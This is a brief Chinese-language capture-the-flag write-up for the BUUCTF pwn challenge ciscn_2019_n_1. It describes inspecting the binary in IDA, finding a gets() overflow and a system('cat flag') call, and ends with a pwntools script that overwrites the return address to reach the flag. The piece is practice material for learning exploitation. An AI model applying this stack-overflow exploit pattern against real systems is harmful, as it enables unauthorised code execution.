> 文章列表 > BUUCTF-PWN-ciscn_2019_n_1

BUUCTF-PWN-ciscn_2019_n_1

BUUCTF-PWN-ciscn_2019_n_1

下载文件

checksec

file

 

 发现是64位的 然后 放入ida

查看字符串

 发现 cat flag

然后看看

F5反编译

 我们发现了system 然后get()函数

我们可以使用栈溢出 我们看看 v1函数的地址 是30h 然后是64位的 所以 基地址是8字节

我们开始查看 system的地址

所以发现system的地址 开始写exp

from pwn import *
p=remote('node4.buuoj.cn',27236)
payload = b'A'*(0x30+0x08)+p64(0x4006BE)
p.sendline(payload)
p.interactive()

 得到